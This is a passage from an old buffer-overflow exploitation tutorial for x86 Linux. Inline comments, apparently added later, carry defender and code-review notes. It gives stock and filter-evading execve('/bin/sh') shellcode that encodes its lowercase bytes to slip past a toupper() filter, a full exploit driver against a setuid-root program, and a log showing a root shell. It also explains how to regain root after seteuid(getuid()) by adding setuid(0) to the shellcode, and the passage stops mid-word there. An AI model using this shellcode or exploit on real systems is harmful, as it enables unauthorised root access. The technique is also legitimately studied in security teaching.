argv[1][i]=toupper(argv[1][i]);
strcpy(buffer,argv[1]);
}
}
----------------------------------------------------------------------------
This vulnerable program converts the lowercase letters of the user input into
capital letters. Therefore, you have to make a shellcode which doesn't contain any
lowercase letters. How can you do that?
You have to reference the character string
"/bin/sh", which must contain lowercase letters. However, you can exploit this. :)
3.2 Modify the normal shellcode
Almost all buffer overflow exploit code uses this shellcode. Now you have
to remove all lowercase letters from the shellcode. Of course, the new shellcode
still has to execute a shell.
normal shellcode
----------------------------------------------------------------------------
/*
 * Listing 1: the stock execve("/bin/sh") payload (syscall 0xb via int $0x80)
 * that the text starts from.  Six of its bytes are ASCII lowercase letters:
 * five in the "/bin/sh" string and the 0x76 ('v') inside
 * "movl %esi,0x8(%esi)".  Those are the bytes that vulnerable1's toupper()
 * loop corrupts.  Defender note: a character filter on argv is not a
 * mitigation for the overflow; the fix is a bounded copy into the buffer.
 */
charshellcode[]=
"\xeb\x1f"/* jmp 0x1f */
"\x5e"/* popl %esi */
"\x89\x76\x08"/* movl %esi,0x8(%esi) -- 0x76 is the one lowercase opcode byte */
"\x31\xc0"/* xorl %eax,%eax */
"\x88\x46\x07"/* movb %eax,0x7(%esi) */
"\x89\x46\x0c"/* movl %eax,0xc(%esi) */
"\xb0\x0b"/* movb $0xb,%al */
"\x89\xf3"/* movl %esi,%ebx */
"\x8d\x4e\x08"/* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c"/* leal 0xc(%esi),%edx */
"\xcd\x80"/* int $0x80 */
"\x31\xdb"/* xorl %ebx,%ebx */
"\x89\xd8"/* movl %ebx,%eax */
"\x40"/* inc %eax */
"\xcd\x80"/* int $0x80 */
"\xe8\xdc\xff\xff\xff"/* call -0x24 */
"/bin/sh";/* .string "/bin/sh" -- five lowercase bytes */
----------------------------------------------------------------------------
This shellcode has 6 lowercase letters (5 lowercase letters in "/bin/sh" and
1 lowercase letter in "movl %esi,0x8(%esi)").
You cannot use the "/bin/sh" character string directly to pass through the
filter. However, you can insert any characters except lowercase characters.
Therefore, you can insert "\x2f\x12\x19\x1e\x2f\x23\x18" instead of
"\x2f\x62\x69\x6e\x2f\x73\x68" ("/bin/sh"). After you overflow the buffer
you have to change "\x2f\x12\x19\x1e\x2f\x23\x18" back into
"\x2f\x62\x69\x6e\x2f\x73\x68" to execute "/bin/sh". You can change it easily
by adding \x50 to each disguised byte to get \x62, \x69, \x6e, \x73, and \x68
when your shellcode is executed. Then how can you hide the \x76 in "movl %esi,0x8(%esi)"?
You
can change "movl %esi,0x8(%esi)" into other instructions that do the equivalent
work and do not contain any lowercase letters. For example,
"movl %esi,0x8(%esi)" can be changed into "movl %esi,%eax", "addl $0x8,%eax",
"movl %eax,0x8(%esi)". The changed instructions do not contain any lowercase letters.
(I think there are other good instructions to do the same thing. It's just an example.)
Now the new shellcode is made.
new shellcode
----------------------------------------------------------------------------
/*
 * Listing 2: the same payload with every lowercase byte removed.  Five bytes
 * of "/bin/sh" are stored with 0x50 subtracted, and the addb $0x50,N(%esi)
 * instructions put them back at run time; the lowercase opcode byte 0x76 is
 * avoided by replacing one instruction with three equivalent ones.
 * Defender note: this is why a character filter on input (the toupper()
 * loop in vulnerable1) is not a mitigation -- the payload restores itself
 * after the filter has run.  The fix is a bounded copy into the buffer, and
 * behaviour-based monitoring (a setuid binary spawning a shell) catches what
 * a byte filter cannot.
 */
charshellcode[]=
"\xeb\x38"/* jmp 0x38 */
"\x5e"/* popl %esi */
"\x80\x46\x01\x50"/* addb $0x50,0x1(%esi) */
"\x80\x46\x02\x50"/* addb $0x50,0x2(%esi) */
"\x80\x46\x03\x50"/* addb $0x50,0x3(%esi) */
"\x80\x46\x05\x50"/* addb $0x50,0x5(%esi) */
"\x80\x46\x06\x50"/* addb $0x50,0x6(%esi) */
"\x89\xf0"/* movl %esi,%eax */
"\x83\xc0\x08"/* addl $0x8,%eax */
"\x89\x46\x08"/* movl %eax,0x8(%esi) */
"\x31\xc0"/* xorl %eax,%eax */
"\x88\x46\x07"/* movb %eax,0x7(%esi) */
"\x89\x46\x0c"/* movl %eax,0xc(%esi) */
"\xb0\x0b"/* movb $0xb,%al */
"\x89\xf3"/* movl %esi,%ebx */
"\x8d\x4e\x08"/* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c"/* leal 0xc(%esi),%edx */
"\xcd\x80"/* int $0x80 */
"\x31\xdb"/* xorl %ebx,%ebx */
"\x89\xd8"/* movl %ebx,%eax */
"\x40"/* inc %eax */
"\xcd\x80"/* int $0x80 */
"\xe8\xc3\xff\xff\xff"/* call -0x3d */
"\x2f\x12\x19\x1e\x2f\x23\x18";/* .string "/bin/sh" */
/* "/bin/sh" is disguised */
----------------------------------------------------------------------------
3.3 Exploit the vulnerable1 program
With this shellcode, you can make an exploit code easily.
exploit1.c
----------------------------------------------------------------------------
#include
#include
#defineALIGN0
#defineOFFSET0
#defineRET_POSITION1024
#defineRANGE20
#defineNOP0x90
/*
 * Payload identical to the lowercase-free shellcode of section 3.2: the
 * five "/bin/sh" bytes are stored 0x50 low and restored by the addb
 * instructions at run time.  Kept as a global so that strlen(shellcode)
 * in main() can size the copy.
 */
charshellcode[]=
"\xeb\x38"/* jmp 0x38 */
"\x5e"/* popl %esi */
"\x80\x46\x01\x50"/* addb $0x50,0x1(%esi) */
"\x80\x46\x02\x50"/* addb $0x50,0x2(%esi) */
"\x80\x46\x03\x50"/* addb $0x50,0x3(%esi) */
"\x80\x46\x05\x50"/* addb $0x50,0x5(%esi) */
"\x80\x46\x06\x50"/* addb $0x50,0x6(%esi) */
"\x89\xf0"/* movl %esi,%eax */
"\x83\xc0\x08"/* addl $0x8,%eax */
"\x89\x46\x08"/* movl %eax,0x8(%esi) */
"\x31\xc0"/* xorl %eax,%eax */
"\x88\x46\x07"/* movb %eax,0x7(%esi) */
"\x89\x46\x0c"/* movl %eax,0xc(%esi) */
"\xb0\x0b"/* movb $0xb,%al */
"\x89\xf3"/* movl %esi,%ebx */
"\x8d\x4e\x08"/* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c"/* leal 0xc(%esi),%edx */
"\xcd\x80"/* int $0x80 */
"\x31\xdb"/* xorl %ebx,%ebx */
"\x89\xd8"/* movl %ebx,%eax */
"\x40"/* inc %eax */
"\xcd\x80"/* int $0x80 */
"\xe8\xc3\xff\xff\xff"/* call -0x3d */
"\x2f\x12\x19\x1e\x2f\x23\x18";/* .string "/bin/sh" */
/* "/bin/sh" is disguised */
/*
 * Returns the current stack pointer.  The function has no return
 * statement: it relies on the asm leaving %esp in %eax and on the i386
 * convention that integer results are returned in %eax.  Falling off the
 * end of a non-void function and using the result is undefined behaviour
 * in standard C, and the asm statement declares no outputs or clobbers,
 * so the compiler is never told that %eax is written.
 */
unsignedlongget_sp(void)
{
__asm__("movl%esp,%eax");
}
/*
 * exploit1.c driver as printed in the text: it fills buff with copies of a
 * guessed return address, then NOPs, then the payload, and hands the buffer
 * to vulnerable1 as argv[1].
 * NOTE(review): the three for-loop headers below are truncated in this copy
 * (everything after the '<' of each loop condition was lost in extraction),
 * so the exact loop bounds cannot be read from here.
 * Code-quality defects a reader should not copy:
 *  - main() without a return type is implicit int, pre-C99 only;
 *  - atoi() reports no errors, strtol() would;
 *  - addr is a long but is printed with %08x (format/argument mismatch;
 *    cast or use %lx);
 *  - execl()'s terminating argument must be a null pointer, (char *)0 or
 *    NULL, not the int 0, which is not pointer-sized on every ABI.
 */
main(intargc,char**argv)
{
charbuff[RET_POSITION+RANGE+ALIGN+1],*ptr;
longaddr;
unsignedlongsp;
intoffset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
inti;
if(argc>1)
offset=atoi(argv[1]);/* optional argv[1]: how far below the current %esp to guess */
sp=get_sp();
addr=sp-offset;
for(i=0;i{/* loop bound lost in extraction */
buff[i+ALIGN]=(addr&0x000000ff);/* little-endian byte order */
buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
buff[i+ALIGN+3]=(addr&0xff000000)>>24;
}
for(i=0;ibuff[i]=NOP;/* loop bound lost in extraction */
ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
for(i=0;i*(ptr++)=shellcode[i];/* loop bound lost in extraction */
buff[bsize-1]='\0';
printf("Jumpto0x%08x\n",addr);
execl("./vulnerable1","vulnerable1",buff,0);/* terminator should be (char *)0 */
}
----------------------------------------------------------------------------
exploit the vulnerable1 program
----------------------------------------------------------------------------
[ohhara@ohhara ~]{1}$ ls -l vulnerable1
-rwsr-xr-x   1 root     root         4342 Oct 18 13:20 vulnerable1*
[ohhara@ohhara ~]{2}$ ls -l exploit1
-rwxr-xr-x   1 ohhara   cse          6932 Oct 18 13:20 exploit1*
[ohhara@ohhara ~]{3}$ ./exploit1
Jump to 0xbfffec64
Segmentation fault
[ohhara@ohhara ~]{4}$ ./exploit1 500
Jump to 0xbfffea70
bash# whoami
root
bash#
----------------------------------------------------------------------------
3.4 What can you do with this technique?
You can pass through various form filters with this technique. When the
vulnerable program filters !@#$%^&*(), you can make a new shellcode which
doesn't contain !@#$%^&*(). However, you will have difficulties in making a
shellcode if the program filters many characters.
4 Change uid back to 0
A setuid root program whose author knows that working with root permission is very
dangerous calls seteuid(getuid()) at start, and calls seteuid(0) only when it is
needed. Many programmers think that it's safe after calling seteuid(getuid()).
However, it's not true. The uid can be changed back to 0, because seteuid() only
changes the effective uid and leaves the saved set-user-ID as root.
4.1 The example vulnerable program
vulnerable2.c
----------------------------------------------------------------------------
#include
#include
/*
 * vulnerable2.c: two defects, one of which the text is about.
 *  - seteuid(getuid()) changes only the effective uid; the saved
 *    set-user-ID keeps the file owner's uid (root), so root can be regained
 *    with setuid(0).  To drop privilege for good, set all three ids while
 *    still privileged -- setresuid(uid, uid, uid), or setuid(getuid())
 *    called before any unprivileged work -- and check the return value.
 *  - strcpy() from argv[1] into buffer[1024] has no length check, so any
 *    argument of 1024 bytes or more overflows the stack buffer.  The fix is
 *    a bounded copy such as snprintf(buffer, sizeof buffer, "%s", argv[1])
 *    with a truncation check, or rejecting over-long input.
 */
intmain(intargc,char**argv)
{
charbuffer[1024];
seteuid(getuid());/* return value unchecked; saved uid still 0 */
if(argc>1)
strcpy(buffer,argv[1]);/* unbounded copy of untrusted input */
}
----------------------------------------------------------------------------
This vulnerable program calls seteuid(getuid()) at start. Therefore, you
may think that "strcpy(buffer,argv[1]);" is OK, because you can only get
your own shell even if you succeed in a buffer overflow attack. However,
if you insert code which calls setuid(0) in the shellcode, you can get a
root shell. :)
4.2 Make setuid(0) code
setuidasm.c
----------------------------------------------------------------------------
/*
 * setuidasm.c: a one-call program; from the surrounding section heading it
 * is presumably compiled only so the instructions emitted for the
 * setuid(0) call can be inspected.  main() without a return type is
 * implicit int (pre-C99 only), and the return value of setuid() is ignored.
 * For a real privilege drop the relevant lesson is the reverse: call
 * setuid()/setresuid() with the unprivileged uid while still root, and
 * check that it succeeded.
 */
main()
{
setuid(0);
}
----------------------------------------------------------------------------
compilean